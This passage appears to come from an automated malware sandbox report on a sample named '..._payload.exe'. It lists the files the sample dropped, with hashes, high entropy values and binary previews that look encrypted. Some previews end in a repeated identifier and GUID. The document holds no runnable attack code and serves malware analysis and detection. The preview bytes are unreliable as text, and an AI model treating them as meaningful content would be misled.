                                                                                                Preview:<?xmlo...$.s.BDT2aK..~. ....j.....P.w.R..Ind.9....$p.[U..q|...1........OdX..)E+.ke.yS.l.K.6*8V#...B]....(.Pr.....B....zTM".p....H.D.~i.D.=...?.D.>wX,........w)kQ.4<.D.....FI5O.*9..........[e....=...[.......R..ys....y.1...Y \Q..V.6...$...\c...P.....|..z!w.....>.^..[.j..q.....C.b..#.?0O%.n..Kt..P.........d.D.,.m..[.. o.>$.Z.....(.....pR....e.@........&.=.@n....C..#.-..d...r...ai.w..d*=.......G%.n...>..1<....'.W.....d9.q..(.N...............*..T{xB..Q.^6s..V.F...t_.C.D.t.OM.C..0.[li.....cx...!..p..A<Qis......*.m.k..n...*...(..o...co...7....n5.j.>+..6..4..........{Y.....@...B....-....^..r..;..q.|X.0...jD.V......Up..._(..>.vWD.Y..,.'..(...6.?Wh6C.. ...v.....6....@P.>..F.vG$N.\.0.....#n.3./Wr<h..,I.......d.....$n...p.Ti....|..)..B..%.v..S.-.. .E......_....4...~.m.68.,..<.g.\....{I<..3...u..v.=..qU..Oj.mpX3.B..2.)0.X......*.B....+.O....l..1.w....n.iU..U.\...A.....Ez.W....>L...Z.....&.Y`W].G.^...q.Cb...8..L1.m.I.T.Y....L..M..p....8D
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1395
                                                                                                Entropy (8bit):7.847350634833515
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Fkc2SHrk4KDLEDS8sPz9MopU93ZimiHKmO/7iQm8jGdmKUC0GRr8WEKXT1GO2wRQ:FkcnHITEEzCObmV5/GkGdfEaTkI0LD
                                                                                                MD5:7F3D9E0C965CD5955BD520E947DAFD1B
                                                                                                SHA1:E641529033C8E404B6F29E613554568AC5F8A1D8
                                                                                                SHA-256:F90A6A41215AA735281466AE9DE405AA1E589318C06F7642C90A81F86BD61705
                                                                                                SHA-512:B73234C9C2E6CA3C1FEA5C52879BBD9AD6B302007D53CDDC70D7D0A739833C878D7BEDF088878C97DE02636348A3BA0DC6BA1AC8CB686EB4D9C969328DD0CE58
                                                                                                Malicious:false
                                                                                                Preview:<?xml.... .u.t..JM.....^....iv.E..i.v.......8..$.q...yo|><..>..IK.o...%w...}E....t@@Y...".....#D..:...F.b..@v..r4/.}}o...c..+..ZR..h|...p.A....>..By\.ws.U..K.rz_.l..7Xs...TW:..Y..v.9...kmM.....IU....K..V..N..k<..........6.f...hN.._...A:.}/.<.....).... ........r.....iO.....Vf.'.M.....8...a..uanb..S.....nzE.B....fJ........K"...vx?.nY.j...V.......]....~..'...I.*.2j+f......|...!C.....1....7[. .4.iZ...:...\.-8...(j=..M.\...{.p.JB...A.(.X0..1.!.OY..D...3..d..,..`,.g..P....#..c5E.4+p`|...p[.us6....Oj@+...-V....`...9T.r.............w....u....*.......$..3..r...2.X.._........lY...n<.`.......8_I..v.............. ..f...G...."J.#.9C..<...f.[...S.Z5.~...@z...B......{../....>W......:..Q.H..Z..",...Z_O..........f.t.h......)"O..a.I.j.. 4b.."\..8{..`#...Jt*.s..w=....r..3...,..0....d.^E..$!y...^9.....!..?....sZ.3_.........G......tx)....A...M..;$.7..(<u...L<.e..Oq./... .....u~y...?i+nc....DQ...m.....#.cm. -.h..dPD....^...1N{..u...V....Y.}.4...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1124
                                                                                                Entropy (8bit):7.811192356802762
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JL0ORgqWwHNrZg2Kvzag+KxzzVcKOeoBlih1aXeZIKKx3bD:JVdH/g7pCpexh4uyKuLD
                                                                                                MD5:46DFDBF00ABA65FCA1DB77BC83E95D1E
                                                                                                SHA1:45444DB484F7BAAB1E2A9FF5B40B0BBED992D1E5
                                                                                                SHA-256:E8B422FCD4EEA2715192F40F79EB4657F4556FCF8DE966F68286FDF5A1FA2A21
                                                                                                SHA-512:09DEEFD0597226EB0441F69C1695FADE40BC0FC1EC76730BD8B5ACDBB7B1F9E5BAFC30D72F1D8D12BA08B122EFD7C217126F03C0F198594A1C64765D7C26EBCB
                                                                                                Malicious:false
                                                                                                Preview:<?xml[..CdH.......03T#.[/g9c..9...v....=.CS!4.M>SHG;{..$.*}kCC".'.x.".J:......~.q.........xQ..J.A?M....Vd..kk....r6.....B`..)..+.7.....Mj6K....h..Y.'F,LW.gZ(2..q4KT....f...v..|.ea9.X.g...l.'.&"g.....j+...oh".....k.h..A..Y..*P.0.|Y?FG.*...{x...pT..}.h...=~[.k..|&.f]k......t.Ot..m..iU...V...?.....{+.WI.K f...dX.V.%z..p..Aq.x...... i.J.......;.|&.."...U..[^..(.q^.h4..I9..h$...?(%.r...5j)._Bk.)2w.^M...c.<....h<'g..M.hsv.......3m.........U.Y.l\..q.}..r}..U7~}.+BC.P...R.Ji.........O.R.......}....k%....@3....E4M1....G.....cPF....T\((G.u..*#...5...&....9J..L!4>......Y-.zc....`1F......../\..z.i.L...JUGq@...cN.Qm+a..OOF.....=..[.#3.......1m..w..aD.........xR...1.&5...#.(.[t..T.2.%v.E.....J..#F./d.a..u..~S$$...%.g..9....1...*..5.M...K........1.cwZ+....mOQH..Q..I!0..uc..I.(..&.U~-. ......<...".&:..Cn.....C.v8e.G.jv..$.....fGw...<.2.f..".x.mBk...h....b;~p.(,.~[....Dx....9?/..r.$.8...:?{iy.......{.I....(.S@.._..#.#....^B...l....t^...s.....@w..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8769
                                                                                                Entropy (8bit):7.979614229103225
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:2647DeMpFrX/rzj+qV24VnJCE39QXFGM9qw0wxDrH5:u7DRTjtV24VnoVGM/NZ
                                                                                                MD5:BA16536B648F40A9B9AC50C209594020
                                                                                                SHA1:099294EFAB8D73C3D9D4719C54E77AC5E837897F
                                                                                                SHA-256:552913CEFFF8B3A949F509939F17F109932076312DFF25A32713D02C79A64BF3
                                                                                                SHA-512:E98963F4E6EDEB118F2824A1492D8F811EB2F806821E37C13FCECD2D99CB583709E1F3410A32299DE72ACC2A3BAE59FEEB35D4D1FB08024FC1D22B370FCA777A
                                                                                                Malicious:false
                                                                                                Preview:<?xml.a(......V^.n5.%.GU.hL..b5.2...q).../....w/....v6.}.kW....xv..6..Zg.`..0...@.?..]-._.6.V..B(.`..8ec2..h5......23........J..&6......Q...."...x[.F.._.....F..-r...D..../..E.....l.=....8!...=u...{.2a...o.I..j....1}*q&Y.....X........I..S_.i...T.....N...a.q..@j..M8pzu`.=XE..?....d..]...J....j!...TsW.x.....Fl8.>...P*K....h..l.........$Y^..+@~|!..m.y....D.....?...x.....a"V...5G...s.t.5....%.......t@.C...5].\.4C.0...~]L..._.l.7...ME.5..q7_iz.....C.+...e.....8.).....$n.T.T.}...n....h8.,.k....".....<... ..J..rb...N..........Y...u....^..$...JD.x............ ..x.Lv.oj:jP.Um.7:q_...~B..L...b3.xW3.Ct..q.q.T..=...-0ZB.....z~.......s..d.]u\{...:2.S..u.x@.,F..*....s:e.N..WcT4..+..K.....F8J.x.r..p...f.g.^.f..2D.~A.\.h.C.b.?S..[.,...>.@.k....+...X...kwJV.%.D...*%1W,..>......}.....:..0.:R.|Z...>@@ZC.%.jm.h/.a...W.55.....}..."x...HQ.^0..kD....,e.m6O.....z......d...p...D..U.8...C........ZK....F...D:..<..Q.8.vG@'.4F.....=...r.....<%...p.Z..,....,...........0..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5842
                                                                                                Entropy (8bit):7.968440982935193
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:vq4tJ+AHl0zZLtnoYqz/OZTgfFZ2Y5UzRljXp5Zsia8ZG8TRVD:vbvFwLtnoMmFZ2i8N5Gmo8vD
                                                                                                MD5:1F2E84779EEDC97D2B083AE1AC21905D
                                                                                                SHA1:1DD0E6783CD8F4F16884CC9C6F7848BAE322A0B5
                                                                                                SHA-256:87AA65E05EBB02F55B948263C14736677466950E092D64EF89DDECD987BF33D8
                                                                                                SHA-512:A121EC2909B1C71F926D1FD7F2281E64BC8DCF31A37F90F5E4FD03B890A34808F76208A02EFF949A45411D52D315B4FF316D0336243FD6D6D6962B240A1851C4
                                                                                                Malicious:false
                                                                                                Preview:<?xml...(..61a..O..>LdX.b!...p.H......F...[7.&x.[X....8.#...[.ZR.......'...d..:h.RM..D..4N.S...x..l..!.hq4.!...E.,.b.....L..s.v..*z3.4...2S.=.Q..)'7f.V}n1.o..m.nz.....>.w..B..J.:..,..6F..;P...\p..8.P....\L..v.TI"MU.).i2..(..$....".Y....H..........\.;.UEX..P.%|...K[.X..w..Q.J...}.fP...7Xd..ACf..G...X.X....P..uL..p...L"-...#.R!X...g.....wl...EY.!.....B(.7....3.....y....A*..1......W(G..b..9.E...t.M..~&3`.o..Xc...}{.k.f...@.~6...>.I.Mu....E.%ADP......T..bd.2.*y'0.o.`g..<~......S.lY.:.cF....f/8FG..z0..K.Jo.a..U......RB....(...{d?..N|..m...,}...9....^.......;.....o.p-.q@..T......}..&.w..}".R..x..DH../.B.Fk6....o|p...c.dQ3...r...5..QO.'..0...\..c.`.X....l......._....z/@.x.p...F..whY.j......=......F./`/jv...R>nH...^.=..~.U.h..UloZ<R.8Hb.`.%..zg)..~...#......e.....VC9...U..V.*.p.B.#`..j/....6.........08.............v..l.Q..o.0...C....!J.<..jV...n..Z.J....|..T...-....:!....7....`.t&F...dH.EmB..f..J..E3..<.._.....--.rt....z..]"."N.....P
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4787
                                                                                                Entropy (8bit):7.958778694107264
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:2ZFGwxndPlMPW0BOmrwfQX+B1dbFqdcVlwpATpxDa4gc98:2ZFGiddURkmsW+7P7wuTvFg68
                                                                                                MD5:C19AE9422E7C9BFE9C4498E186B3F7B7
                                                                                                SHA1:CE5C5583292B9BE9AEC15E9ABF0FF77D9C169869
                                                                                                SHA-256:FC965E601833B2F0C3A03649327D18A50035E419F4A36F726F3D89EAEED1B857
                                                                                                SHA-512:747B1A59F15120F23A62A5C421FBB94ADB1EAF8AEE1FAED0D6C94B2A4B4CE2A3198ED6E3CA6ED0D1518BF1CC4F7E0B0CDD0BB6BDFC74AD165523003C156EC46E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.B.N.....l....... ~..A.'...._s...h..7$.....2L..o..~..Y...[.p...@=0..+.-Ssh7....YN.?..iq0.$r7.....ts......=.R.Pf.......*.WE..g.".&.>O..t...Cx..92.....Z|..qN..H^..eu.w.":.1\....Ex/.%V...d..xx.M$z..*O.(9N.........mj.?.1....yY.XR.t..\..(L...e.~....4.s..b.7.[.T.;u..}._r.ud..0q4..7/....6..0..o.....r.{..a...7.;y.QI..Y.....o..D.nL..........F.:.m..5..IK.....T.......e{.L|b'....V_[a.(....;..tD..4..&.<....D.1...dF#...Q'.'`.4.,......,T@...+.x.7v..I......s.. USt.-Z.;...Do.....TS.<.........+.;.)%...u..........X.......'3.. N.3...8...^..w.-.J..'.!.p.9.X..<..i6.CG.[b..9..y.ts.!.........Wc.z.]....Dr/..N..qZ/%u....M/=....._..6r..KH}*c.....q0.. ....9..^...9...$.....O.h.q.<+....W..cn?U.1.}....b.*l.d..`? ..e...=.1#.,.L....3U.;...]..~.....n...UD..J.x.FxbZt......mLg.1K"..(...7.....'..>."..;.c`wbH.e.I.;E..>".......|._....@.m.YJ.Rk.9.8...ll.."..Nj..H|i..c]...Eh.].|...^.z.h..V....2.E.bNsd.......k..m#...._.......N...'%........n....y.[.RM. B.......:1...v
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4786
                                                                                                Entropy (8bit):7.95657160137994
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:wY3Guz8DFTjyO4QRdmuGfiAfh12RAjUGYy/f9J31:aaQ/mlfiih1PA/Czl
                                                                                                MD5:9E6560BB2B84BC306C75C438ABAF0FC7
                                                                                                SHA1:7021475C438248B72919A47004611C1909BFC460
                                                                                                SHA-256:49EAD604D115575E9D3F3613C11122C08E4348802A1B034CB049EAE77AD40F6F
                                                                                                SHA-512:C99A27AF3E4178BE56D729AED404B85E546198977F24765AA6FB5C037E6B4815D500ADCC6B49A9B12F68611C9B5E9EFBA990A4213184B5A05E0F6C3B1B1011C0
                                                                                                Malicious:false
                                                                                                Preview:<?xml?......I.g..4Y...7..>Q...K;'..W.o..R..A.C>..a.*3..A.....3zX.*.%....!..3...-..8Kt.w_D.........}...s..zT*...<.p1...%...*`3....|z.F}`z........$n.*...(e.}t...F(......7NbR..3.i...Q.Y....-d..J..1'.R........V..|.R..p..M.C....AI. b.H.M..F..p1a.....<.|...(....a..c.6.._{..`SrE....Z.......{>..z1.a.p.+.......S.Z..I.4.,r..b1.....E......\[....n...hUG.m.?^........1.r....-.C}...?.o.bwQ..._..@.cA.P.....#...PL1..|......4....[5z........".0.....,.Wo..a...V...E..o..sx./t..g.....m....T..Tf*.Y..e~...<..vs*7.x"o..hw...c.v.g...2{'M.[.46.zR.(4?...}G.:.E.:...R.n......\....4c.a.xe...Q.az......'...r..8t.n..!1......6..Y{{s*.&.....A...y..=.j{\...z..158.....:U'....).......u..tEE...S..~..'.......@w.7.:..e..(.%......@_.....m`p.x...^.....|R......0P..T.....!..<S'(......~G..&5..#...B..c..@.W..A...DR..+...5.j....V.8[..l..t.}..(.Ii..e....n9$.@*.]..4h.t..B.(.........ig.ikV.L.0....B.$..$..'.l..h.......c.'...w'v.4.Pf4.....n>.'%H..A.^.Bw........X.....Q....x"...hD.`.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3030
                                                                                                Entropy (8bit):7.938508008113329
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/hWMMuz+aUziy5QnNq/HRqoeQYYq2AVCtFpgX+B1bd8+0we2L/h9mGKoKRLeu7Te:/hhTz+aqiy5Qw3w2AVUqXgn8+0Pe9Uxe
                                                                                                MD5:87A9F418BFA53486F9B351B8FB52A31C
                                                                                                SHA1:CC5A7D9AEE4412EE5D78C37C88BF505093FE9F93
                                                                                                SHA-256:8385F9EF8DD96E8281E449BBB8A21361F0E296E172222C68DE1B1775963C1C58
                                                                                                SHA-512:406A7240B4A05FFBF920BA1FE7539B415A94B0076DC4C7227E10A912F9F2AF7DA7A72D3AB0CEE1AE8AF21D94D6E16BF2AAAC6C8767A6101E24AB13BA5C751F06
                                                                                                Malicious:false
                                                                                                Preview:<?xml\-....BW..gj.A..Rv+`...D..Q{x.]....ka..q..4..7.._...{.o@.T$.q-....#.=.T~(Z...}.......>.)3.t.'...O..8.5@+kT.|...d..!......%-.fqw..S..v.+..4.C...SZ....E....SM]..d.X..r).x.*.aU......z.;..d.@....[;V....\.'.$.1..jl./K..t....Y.D..&%W._........I...8.....hk.o.L...V..W.!p7r.2.8.....f.~..V..V...........&.j............&...zb....Wkn......B...)Oo.].$....V.]q...G>?e.^wf..x.!.TE+`...7V.R6L..A....~B'.b.Es.L...g..u........pN.p.I... B^U.= s.......K...>+..m# ....!..d..h5..O...j.).r#.by+.o.!*r.....3@.<Z.T.......f_Vx.V'......Y.MG...hx~b.D.Y..dH.Q;.1.p..k..b..]...F..7.?.w1.sW...'..qR......dP.JT.H..vR..........7q......g....z...A...T...Pa.a6:.\........;JWp...o.0 ..PP..#<...\....'....QP..[.t%......f...x.o...T7.V.r.`9W.._@.V...].!.h....>.Wb..........t..O.ECy.^L..j.....o...Hl.].lU.{...U.V@.m.-.j..<..=.T~(3.i....q&<ew%....".{.....G.....q.C...hT.A..Q..........7....c.n.4i........$..:G.L..4.....W..v..$6....h.L.E...g81.!..E5sTi>29.8..Y#.....(4.....o0.|+PR,
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):789
                                                                                                Entropy (8bit):7.7079045665043155
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QsutLpZ9s+TQAeuVmC0vXtFi/4jCgx3bD:DunZu+TQ5usvbBLD
                                                                                                MD5:D1C8F8EBA2362E20E159D3505C3633DB
                                                                                                SHA1:D74F2454E88E35095A18F6D2448183E981E0DB1E
                                                                                                SHA-256:D57FEF6AEE3BEF079C8695292AB2F56EBE5FEDDCAE053DBBC6470AA6396BC3F2
                                                                                                SHA-512:6FE32F8A033079F148EC7D7AD26E53F1283E4E6629994A1064D5D7417486AA5F003A776D296B1F04DC12875C9EAE295A445C13082CF8A4484FB4CB94193C1DD0
                                                                                                Malicious:false
                                                                                                Preview:<?xml.).wC....Q..]...r.v...y.[..v....m.9..3|.}.v............^.n.g.....vIw,#.F..J@#.)....Z.?U...<....f-.!.*.....}.9i.7|U..".v..pd...3;?..T;......h.w.T..X:F...R...EI!Q.Q/.~..K.C..-].U.9e...B0.,L..7;h....*<.;XP@.x...(.w..]..`5..i.n....M.I<*[..@j...M..%A..L....2c[.].dw...KG..g.9.....h.6.N...~>C....#......eXW.=|.1...-..^}..m?`.#)0:...+..\>8.........F....f~..._.v.C;..$.uio..1.&.\.9_./.@..y.0.k..iM.J.......I!...:).~..8..}...r..\..{....JY..G0.....W....p&9...d.....!..m..~.......%A..tr...[T.I...k.+......b.if.......q....CkN.2..&.M.E...\....{.'.`Rk.<.O.9h.SA.F.}V....+.."..e...(.O...+$..K...*..E^...5...).N....}..._ag.V$.'m..........`N..z.>.e....S>..8.fj.C.\3..>.!".A...AI4BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3017
                                                                                                Entropy (8bit):7.932562869795289
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:vtdxDmeJQ49N1+/3Sjus/qp+oAzCigA3kPun3vj3+wvBeyd2qRrDVwBC6cVLD:FpQ4Afrsip+4iLkun3v6UMydhrDVwBC3
                                                                                                MD5:3766797DACF6C798F449B1AB4EB5E88E
                                                                                                SHA1:A0DF640A52CCC420E3B432F21E969F7A08006124
                                                                                                SHA-256:9311CC7D3A78C0049ABFE5616AD011398FD52B9615CC1FFDCC370FF60B6CF075
                                                                                                SHA-512:4D8F87DE74738EF6D7C6574969BF9E0BAA2EF4BBB3F311DED62C6F6D55267D436C7BCE7D75A519A38D159B48387EA029067F35734CAAF164DD7B60F09BCC70FA
                                                                                                Malicious:false
                                                                                                Preview:<?xmlEo.I:..S........}-<..K}..=nA..C..U...DE.@..9?.O....*......z........{....uZd.I..5.{w..up..)..`.j.I...~..X...vY.......5....H..........z.\....D../z......w:[..CSm..8P....._.8x7.u...A..Q....A...i.*^4^R....mq..!KH..D... ...[.M.......y.5V...82L%{............i.RY@. ..y.R.k..o[..D.Dt?...F.kp.u.+.......z..G.......q0LF....Y..........a^A.n.l..K..vR.....j. .t....J..G.o...[..1NtC.......P...J..%..t01... .X.7..-f..J .?..........'SxD.^....Lu...>~.oP..n.;.lWU{.~...`.j.(.+>xg@..$..3.aq.....>.....r....%....fH....g.......J..s?....7s.....V..\F.\.o.c.C.r..Z.....%.....#.V%.3.].~.Sm....+..j).9!..,.p.d..G...@.....#.t.o..N...G.2.?...............46O.p..D...+.5..knz)..n.G'Zdq.O..1.....#..z..1c...N)....zT......D~_[....P^A.@'.4.O.. .......gb...i>..2..#S...KQQG...x..v.Jd..W.r...K....sH6.H....St...-.v.D.0!4..b..#.u....2..2..$......N.f..>l..J......@:.....N.x.[....B.T...U.t.Z.UE.6...M`;/.x{.).....[......}k.G.u.0.5.m.a.}......].&..v..F...1.XL..H....\$...h...p7....)...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):823
                                                                                                Entropy (8bit):7.768416258657488
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:McH4cQ3g/hZ+upzyQXOMiUtR2LEMWBbluOp5x3bD:McH4cn4W27U/2aBblJLD
                                                                                                MD5:EAB951C5DA067DE6FBCD43CA59D073AA
                                                                                                SHA1:D49AC322A8295EC04BF034D1D6747F14B5318E36
                                                                                                SHA-256:DFCE612535D87A0C1DE538A0EB2B00B2C9641FA157B34AF683ACBF7448135603
                                                                                                SHA-512:DF0098F5D93A37FE03C5645AEED95943173EBEFF0FD48C4AF3AA85FC74D99462CC5E8DDF821D221F8755E44AF35BA2BAEBCB4E94A75A149B4280ED0E225C0259
                                                                                                Malicious:false
                                                                                                Preview:<?xml.~15K../.w&`./...mI].D...X P.....o.f..z. ............v..z.^....Z.3...o..+.a.#.:...S"....#Z.E .M.UL.._......{Q...fp...w..HJ...x2.s./z..........?.x.....R..Q...\.....jt.....wJ..o.R]..HG..m.....\..a*.\.p.....1.qa...N.e!.%..4...).o..l...|....K...KW....G7.Y....E I.e.x....8...5...|..pA(JW\..T.....3.j....b~..n..D..}..(.j...X.Ph9A.@....Q.:6Js.....zh.D..z.tQ$z..@0.h.Uy.m.O....N..... .9..b40....TN.<..,.....w.....zB<%..i.<x$.K..# v....6*.l`X5X...)V>....S.n.==^.Mq.D>....W @..-B.z. .@ .."|.......^.v.Fk..j}...E..VM...[.......7.b..m.s.l.....<*.1...<..&.)..&....U....Mm.....q..A.0M.92..p.....(..P..e.8...>..9...m0._.._4x.)x./...F8..WC....P.GG*.u\n.L._..p.?....g#i..U.H.......v]...3.A......Gz..p.y..b.Z.HSf...r.|.|.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3017
                                                                                                Entropy (8bit):7.9399752824107495
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:yYWBjrP33EmevhGl93PT6GBRcdY68W22lgqPTfAy8gSCNwtow9QOSg/KLmLD:yYG3EmevEf3PTXedHPTfAy8VCN07Sg/p
                                                                                                MD5:718C571D9187C3C4802775733292ACEF
                                                                                                SHA1:4D986718FA79AA5A1FB8A7A2EFC97A55E6ADED1E
                                                                                                SHA-256:7FE1088BBE681F6D37E9B365D236519393B5FFF1C19DDAD7931C1ABF10193908
                                                                                                SHA-512:E3CD58C0F456FE39B60185DC006E1DC2BA8F1AF3DCCE8FB9DCEBB933BFDEB68F8E46936EE7C9E57D93A65BA6BFBC2D2051E72E40DC8B80B314D5C44572EA9A07
                                                                                                Malicious:false
                                                                                                Preview:<?xml;.}&..~a!W.YG%0Hh5.KA....p......h........~..D.a..].cG..l.,.=.2.R[O.>:G....K.W.d........Y....~=.'T'...b..p.4.o....HfPhk...Q.jE...Vzi.......~.*.s..".{."%..&3..X"x....`....x...i....;....he.3...hh.l`8.....8.7.k:wQ........4..H....KwHJ..mdX.m&...T..w.Y[.UZ1......J.q.5...f...:eb#...>.Hk..JA_.q....;...t.[..].&.Ra.|..hE.D.9.........E....NV.e...b....;[Cz.8.IUy.]...Z,.....n.1./.c...s.z.Y.k;..Gi.+jnV...yO...(.c..z..@f......p.gL.s..W..@J...IRT..w.......=1/F[...?o...zRK....hz.^..u|..#.3.>j..}u|..vb.F...\.9>.s......he._^.$qr...v.VsS.&.......#.p.....~.....U...!.....a.%..5..S...H..*!ELk..L1(...t.9y.W......iE.'.~?...u;..........XmC.N....|......g..!-.,...v.].4.#......2..N.Q.....,.a.!...|.J.M..x.v..G.I.......g.&l....S.y...!w...~... ..+...e.x..m......cpa.O.Q.L..6....<.N.T.".C..T.yrX%..o...T..|C...6.....[....Ue./.b...Q....>.].%v..l.i.'..i...o.O,...$.....@.9.j.S.D...'6we.O-?..Rj..{.>Z..7....D..../..RA.......qr'...}...=*.......U.ih......p.]..p....l...Vp+.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1021
                                                                                                Entropy (8bit):7.788874559626995
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:s8Ke7VmEj4PExkww+ogIeJWIN+/Pc4F0DN6saAmcwx3bD:m6FjfiwAuWw+/kc0D0K8LD
                                                                                                MD5:12F08684D79DF3FF90881A075352702F
                                                                                                SHA1:A04BDE0AECA8AC089F15E1F7CBED440BB89913FC
                                                                                                SHA-256:A288E7B7F4335BA8922572B189A946D5B4CC4CBA315CD2210416686ECAC5634E
                                                                                                SHA-512:DE696CE826F976AE4559FDF2CB60DAE369F3A00EB8759BB1B290DCB714434D9EB3F136061640A9065517C3291F4085C691EE8DBCC4CD8F412C8109FF8AF8047B
                                                                                                Malicious:false
                                                                                                Preview:<?xml..*;.......A*...w.h.......V.P...G$....j0K....#.LR..F....2U.W.... J..3.'%.....h....&\.k..r....mW...=..7).....-......X;4..rh.X.bi.i*..........u...._..Y.N.K|.*...B...}.......].k.....B......0.*..,......[X...6eJ....E9..........x%.a(.es....gq....."Of.z...W..DS]=....]...W.*.+..;.Sn......=.\P!..Rd**.w..m.....G....%u..1;$f.^t.7E.YP.ub.m....Ju....V+y..8o.%..;^..M..q..]Rb.Tf%...p._=..V=>...R...\...>.Nl........{.....@.T.p(...As..[..cq.]....F...dT.z...E.x.k..4.":0KS.......;....;.....W.^U....=.w8.m...D7 ....W..>..he-.u.8.....v.v....K;.2.\..%.f.....>..I.{..=....p.%..8..3...v...;.O.r....B..b.X.r+...E).J.S.5HIF.....V..h).I..u!..).....N.>bgQO.H..:^.J..N.4....u.[T...`..%....?.|...'....)q.K..G....>N..z.......7......o...OO.......O.m..*.&.&T.K.Z[..S.m.t...[.c..W.ZU.j...,^E..P{......4.[..n.o0....U.k.x....!.C...m....[.].A...../}.(.(....z;..1....\..^...?..w0$.82....x..3 @.B...v.Yc.3L...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1398
                                                                                                Entropy (8bit):7.8482953215950895
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7j/5xK6ifkg3O+sHYs7M+0ojQjUUlhxSONF+lO0rA0Z2pP05eIx3bD:7j/HFiM2Y0oIUULxSONF+lO0IR05eELD
                                                                                                MD5:90130526A7C8301F2D0B46F9B474112D
                                                                                                SHA1:442E1324E2700A3CEBAC6BE43955F18C3A349209
                                                                                                SHA-256:3CE6293144ED85168315CAABC950C2F3C10DB54FE6AAD9038ACFD0A23F5B6CEF
                                                                                                SHA-512:DCEDF72EC3D1D06E1B624D5C0104D9258E9B231E480D053D8BFB9120043329079EC081453DF387C2E6054304070E5ADF1B1559C28405F380272934F5E74508A4
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....\.lG..T..'Fk.4?......C%....b.(.m$.vm]\..id....S.Q?..">x..z.!R..../5..Y..|].7M....(:@...93.....d..h.....*.......byu.n.B...n..3_...O.......UD..{....`m....)...$.8..e=....."..<..?.......d..%K.N.;.z...).|egKrJE..TK.C..]X...A.@..:....[.....m..[.!..~..@..;..."....<7t..B=.LE...HX..).L[.k.=K.1...!........~.d.UM.S.....F.-.w..g..Y%.8"Nf.9.uP.."...f....[......V.X..... .`]r.4....?...C.....d...x...Z.8.Sn.c.)./@.uX"F5....c.++..t..L%..:....yF.......N.JG.YO./.F.x....lB /...g$N.c..bC..!p....2J!.....h'v..?.1....0..Q.P.ovU.eZ......8.F?$......J..<..k.p.QX.....l~3l.L...."l.....0..Y..........WN.........z.vh..0..j.c<H......'...o..dJ..].#q..P..R.Q.j.5j......yd.......T.Z.. ..b..3N.V4G.{..++...G.D....9....L..qj.z4z...(sn...... H..r.vV...p.~s..#.*.4..._.%.....>&......p....v.^.$.X.&T...e..I.BM.....)v8z[..E.^...<x'.. ..._B#[ ........).P]..cp.<.....'..C..8>.,.....u..&|..Rd..s.2rAO.9n'......s.6Y,/6|..q)...nk..{....@..~:,n.....t.1B..o...=-...+I.u.p;.e.....r=~..{.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):937
                                                                                                Entropy (8bit):7.766648780100246
